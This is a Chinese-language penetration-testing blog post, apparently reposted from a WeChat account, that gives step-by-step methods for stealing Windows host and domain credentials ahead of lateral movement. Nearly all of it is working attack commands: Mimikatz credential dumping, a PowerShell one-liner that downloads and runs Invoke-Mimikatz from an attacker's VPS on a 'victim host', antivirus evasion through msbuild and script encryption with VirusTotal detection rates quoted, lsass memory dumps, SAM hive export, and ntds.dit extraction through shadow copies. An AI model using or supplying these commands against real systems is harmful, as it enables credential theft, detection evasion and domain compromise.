|
主机凭据获取
本文主要讲解内网横向的前置准备获取主机凭据,通过获取的凭据后续进行PTH、密码喷洒等。这里主要介绍几种获取主机凭据的方法Mimikatz抓取、离线转存储等
|
漏洞信息
混子Hacker
01
Mimikatz抓取
1.1 Mimikatz抓取
Mimikatz是由法国安全研究员 Benjamin Delpy 开发的一款开源工具,最初用于演示 Windows 身份认证机制(如 NTLM、Kerberos)的安全漏洞。通过它可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码
lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码
需要注意的是,Mimikatz在低版本的系统win10和2012R2以下版本中可以抓取到明文密码,但是在win10和2012R2及以上的版本中默认禁止存储明文密码了
下载地址:
https://github.com/gentilkiwi/mimikatz/releases
cls: 清屏
standard: 标准模块,基本命令
crypto: 加密相关模块
sekurlsa: 与证书相关的模块
kerberos: kerberos模块
privilege: 提权相关模块
process: 进程相关模块
serivce: 服务相关模块
lsadump: LsaDump模块
ts: 终端服务器模块
event: 事件模块
misc: 杂项模块
token: 令牌操作模块
vault: Windows 、证书模块
minesweeper:Mine Sweeper模块
dpapi: DPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口]
busylight: BusyLight Module
sysenv: 系统环境值模块
sid: 安全标识符模块
iis: IIS XML配置模块
rpc: mimikatz的RPC控制
sr98: 用于SR98设备和T5577目标的RF模块
rdm: RDM(830AL)器件的射频模块
acr: ACR模块
version: 查看版本
exit: 退出
抓取明文密码
privilege::debug 提升至DebugPrivilege权限
sekurlsa::logonpasswords 导出用户凭据
1.2 powershell远程加载
Invoke-Mimikatz.ps1下载地址:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/refs/heads/master/tools/mimikatz/Invoke-Mimikatz.ps1
将powershell脚本放到自己的VPS上
然后在受害主机上运行
powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal "IEX(New-Object Net.WebClient).DownloadString('http://vps-ip/Invoke-Mimikatz.ps1');Invoke-Mimikatz"
需要注意的是像mimikatz这种常见的渗透工具早已经被各大安全厂商加入了特征库
一般传上去即被杀很容易暴露攻击行为,实战中需要做一下简单的免杀
1.3 Mimikatz简单的免杀版
原文链接:
https://blog.csdn.net/2301_76786857/article/details/140174818
方法1-白名单msbuild.exe加载(VT查杀率4/59)
下载mimikatz.xml
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/executes-mimikatz.xml
执行
C:WindowsMicrosoft.NETFramework64v4.0.30319msbuild.exe executes-mimikatz.xml
virustotal.com上executes-mimikatz.xml查杀率为4/59。
方法2-使用Out-EncryptedScript加密(VT查杀率0/60)
Powersploit中提供的很多工具都是做过加密处理的,同时也提供了一些用来加密处理的脚本,Out-EncryptedScript就是其中之一。
首先在本地对Invoke-Mimikatz.ps1进行加密处理:
先下载Out-EncryptedScript.ps1脚本,下载地址:https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Out-EncryptedScript.ps1
在自己的电脑上依次执行
powershell.exe
Import-Module .Out-EncryptedScript.ps1
Out-EncryptedScript -ScriptPath .Invoke-M
默认会生成的evil.ps1文件。其中两个参数:-Password 设置加密的密钥-Salt 随机数,防止被暴力破解
将加密生成的evil.ps1脚本放在目标机上,执行如下命令:
[String] $cmd = Get-Content .evil.ps1
Invoke-Expression $cmd
$decrypted = de tidesec 123456
Invoke-Expression $decrypted
Invoke-Mimikatz
virustotal.com上evil.ps1文件查杀率为0/60。
混子Hacker
02
离线导出lsass.exe密码
sekurlsa::minidump lsass.DMP
sekurlsa::logonPasswords full
在目标机器执行下面命令,导出lsass.dmp
procdump.exe -accepteula -ma lsass.exe lsass.dmp
再使用mimikatz读取密码
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
需要注意的是从目标机器导出的lsass.dmp需要在相同系统下运行。
混子Hacker
03
SAM数据库提取HASH
SAM(安全账户管理器)数据库存储本地账户的NTLM哈希,位于注册表中,由SYSTEM密钥保护。
导出SAM、SYSTEM和SECURITY文件
reg save HKLMSAM sam.save
reg save HKLMSYSTEM system.save
reg save HKLMSECURITY security.save
lsadump::sam /sam:sam.save /system:system.save
混子Hacker
04
卷影拷贝提取ntds.dit
ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%ntdsntds.dit是一个数据库,用于存储Active Directory数据,包括有关用户对象,组和组成员身份的信息。通过提取用户哈希值,可以使用诸如Mimikatz之类的工具执行哈希传递攻击,或使用诸如Hashcat之类的工具来破解这些密码。
运维人员会利用卷影拷贝服务(volume Shadow Copy Server,VSS)实现ntds.dit的拷贝,VSS本质上属快照(Snamshot)技术的一种,主要用于备份和恢复(即使目标文件被系统锁定)
利用vssadmin提取ntds.dit
vssadmin 是Windows Server 2008及 Windows 7提供的VSS管理工具,可用于创建和删除卷影拷贝。
创建C盘的卷影拷贝
vssadmin create shadow /for=c:
在卷影拷贝中将ntds.dit复制出来
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1windowsntdsntds.dit c:ntds.dit
删除快照
vssadmin delete shadows /for=c: /quiet
最后还需要转储system.hive
利用impacket的secretdump导出ntds.dit域内用户hash
python secretsdump.py -system system.hive -ntds ntds.dit LOCAL
|
<<< END >>>
原创文章|转载请附上原文出处链接
更多漏洞|关注作者查看
作者|混子Hacker
原文始发于微信公众号(混子Hacker):【内网渗透基础】内网横向-主机凭据获取
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论